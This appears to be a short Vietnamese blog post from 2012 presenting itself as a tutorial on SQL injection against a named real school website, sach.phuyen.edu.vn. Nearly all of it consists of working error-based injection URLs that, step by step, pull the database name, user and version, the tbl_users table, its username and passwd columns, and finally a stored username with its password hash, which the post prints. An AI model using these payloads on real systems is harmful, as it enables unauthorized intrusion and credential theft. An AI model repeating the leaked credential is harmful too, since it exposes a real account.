Thứ Ba, 21 tháng 8, 2012
[Tut] SQL injectinon sach.phuyen.edu.vn
Get database,user,version:
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07' and (select 1 from (select count(*),concat((select(select concat_ws(0x7c,database(),user(),version())) from information_schema.tables where table_schema=database()limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get table: tbl_users
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7c)) from information_schema.tables where table_schema=database() limit 70,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get column của table tbl_users: username, passwd
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7c)) from information_schema.columns where table_name=0x74626c5f7573657273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7c)) from information_schema.columns where table_name=0x74626c5f7573657273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
Get thông tin column username, passwd:
Code:
sach.phuyen.edu.vn/cocautochuc_view.php?id=07'and (select 1 from (select count(*),concat((select(select concat(cast(concat(0x7c,username,0x7c,passwd,0x7c) as char),0x7e)) from tbl_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
|sach|0e33aad5b3773c3314fd289c4b4e80c4|
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: